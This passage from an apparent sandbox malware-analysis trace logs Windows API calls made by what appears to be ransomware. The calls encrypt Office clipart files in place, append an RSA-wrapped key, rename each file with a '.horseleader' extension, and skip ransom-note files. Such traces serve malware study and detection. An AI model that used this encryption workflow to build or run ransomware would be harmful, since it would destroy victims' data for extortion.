(lpFirst="BD19582_.GIF", lpSrch=".txt") returned 0x0 [0253.282] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15733) returned 1 [0253.282] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3d75, lpOverlapped=0x0) returned 1 [0253.285] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc28b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.285] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3d75, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3d75, lpOverlapped=0x0) returned 1 [0253.285] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.285] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.285] WriteFile (in: 
hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.285] CloseHandle (hObject=0x158) returned 1 [0253.285] GetProcessHeap () returned 0x780000 [0253.286] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.286] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.horseleader") returned 79 [0253.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.horseleader")) returned 1 [0253.287] GetProcessHeap () returned 0x780000 [0253.287] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.287] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c6cc00, ftCreationTime.dwHighDateTime=0x1bd4d5a, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc4c6cc00, ftLastWriteTime.dwHighDateTime=0x1bd4d5a, nFileSizeHigh=0x0, nFileSizeLow=0x32b6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19695_.WMF", cAlternateFileName="")) returned 1 [0253.287] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="Windows") returned -1 [0253.287] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 67 [0253.287] StrStrIW (lpFirst="BD19695_.WMF", 
lpSrch=".horseleader") returned 0x0 [0253.287] lstrcmpW (lpString1="BD19695_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.287] lstrcmpW (lpString1="BD19695_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.287] lstrlenW (lpString=".testttjffg") returned 11 [0253.287] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.287] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.287] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 67 [0253.288] StrStrW (lpFirst="BD19695_.WMF", lpSrch=".txt") returned 0x0 [0253.288] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12982) returned 1 [0253.288] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x32b6, lpOverlapped=0x0) returned 1 [0253.290] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcd4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.290] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x32b6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x32b6, lpOverlapped=0x0) returned 1 [0253.291] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.291] CloseHandle (hObject=0x158) returned 1 [0253.291] GetProcessHeap () returned 0x780000 [0253.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.291] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.horseleader") returned 79 [0253.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.horseleader")) returned 1 [0253.293] GetProcessHeap () returned 0x780000 [0253.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.293] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee332800, ftCreationTime.dwHighDateTime=0x1bd4d59, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee332800, 
ftLastWriteTime.dwHighDateTime=0x1bd4d59, nFileSizeHigh=0x0, nFileSizeLow=0x25ee, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19827_.WMF", cAlternateFileName="")) returned 1 [0253.293] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="Windows") returned -1 [0253.293] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 67 [0253.293] StrStrIW (lpFirst="BD19827_.WMF", lpSrch=".horseleader") returned 0x0 [0253.293] lstrcmpW (lpString1="BD19827_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.293] lstrcmpW (lpString1="BD19827_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.294] lstrlenW (lpString=".testttjffg") returned 11 [0253.294] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.294] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.294] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 67 [0253.294] StrStrW (lpFirst="BD19827_.WMF", lpSrch=".txt") returned 0x0 [0253.294] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9710) returned 1 [0253.294] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x25ee, lpOverlapped=0x0) returned 1 [0253.332] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffda12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.332] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x25ee, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x25ee, lpOverlapped=0x0) returned 1 [0253.333] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.333] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.333] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.333] CloseHandle (hObject=0x158) returned 1 [0253.333] GetProcessHeap () returned 0x780000 [0253.333] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.333] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.horseleader") returned 79 [0253.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.horseleader")) returned 1 [0253.334] GetProcessHeap () 
returned 0x780000 [0253.334] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.334] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed01fb00, ftCreationTime.dwHighDateTime=0x1bd4d59, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed01fb00, ftLastWriteTime.dwHighDateTime=0x1bd4d59, nFileSizeHigh=0x0, nFileSizeLow=0x2244, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19828_.WMF", cAlternateFileName="")) returned 1 [0253.334] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="Windows") returned -1 [0253.335] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 67 [0253.335] StrStrIW (lpFirst="BD19828_.WMF", lpSrch=".horseleader") returned 0x0 [0253.335] lstrcmpW (lpString1="BD19828_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.335] lstrcmpW (lpString1="BD19828_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.335] lstrlenW (lpString=".testttjffg") returned 11 [0253.335] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.335] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.335] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.336] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 67 [0253.336] StrStrW (lpFirst="BD19828_.WMF", lpSrch=".txt") returned 0x0 [0253.336] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8772) returned 1 [0253.336] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2244, lpOverlapped=0x0) returned 1 [0253.339] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffddbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.339] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2244, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2244, lpOverlapped=0x0) returned 1 [0253.339] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.339] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.340] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.340] CloseHandle (hObject=0x158) returned 1 [0253.340] GetProcessHeap () returned 0x780000 [0253.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.340] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.horseleader") returned 79 
[0253.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.horseleader")) returned 1 [0253.341] GetProcessHeap () returned 0x780000 [0253.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.341] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e2200, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe58e2200, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x3896, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19986_.WMF", cAlternateFileName="")) returned 1 [0253.341] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="Windows") returned -1 [0253.341] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 67 [0253.341] StrStrIW (lpFirst="BD19986_.WMF", lpSrch=".horseleader") returned 0x0 [0253.341] lstrcmpW (lpString1="BD19986_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.341] lstrcmpW (lpString1="BD19986_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.341] lstrlenW (lpString=".testttjffg") returned 11 [0253.342] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.342] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.342] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 67 [0253.343] StrStrW (lpFirst="BD19986_.WMF", lpSrch=".txt") returned 0x0 [0253.343] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14486) returned 1 [0253.343] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3896, lpOverlapped=0x0) returned 1 [0253.356] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc76a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.356] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3896, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3896, lpOverlapped=0x0) returned 1 [0253.356] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.356] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.356] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.356] CloseHandle (hObject=0x158) returned 1 [0253.356] GetProcessHeap () returned 0x780000 [0253.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.356] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.horseleader") returned 79 [0253.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.horseleader")) returned 1 [0253.358] GetProcessHeap () returned 0x780000 [0253.358] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.358] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1fa9b00, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1fa9b00, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x4780, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19988_.WMF", cAlternateFileName="")) returned 1 [0253.358] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="Windows") returned -1 [0253.358] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 67 [0253.358] StrStrIW (lpFirst="BD19988_.WMF", lpSrch=".horseleader") returned 0x0 [0253.358] lstrcmpW (lpString1="BD19988_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.358] lstrcmpW 
(lpString1="BD19988_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.358] lstrlenW (lpString=".testttjffg") returned 11 [0253.358] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.358] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.358] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 67 [0253.359] StrStrW (lpFirst="BD19988_.WMF", lpSrch=".txt") returned 0x0 [0253.359] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=18304) returned 1 [0253.359] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4780, lpOverlapped=0x0) returned 1 [0253.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.362] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4780, lpOverlapped=0x0) returned 1 [0253.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0x0) returned 1 [0253.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.363] CloseHandle (hObject=0x158) returned 1 [0253.363] GetProcessHeap () returned 0x780000 [0253.363] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.363] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.horseleader") returned 79 [0253.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.horseleader")) returned 1 [0253.364] GetProcessHeap () returned 0x780000 [0253.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.364] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 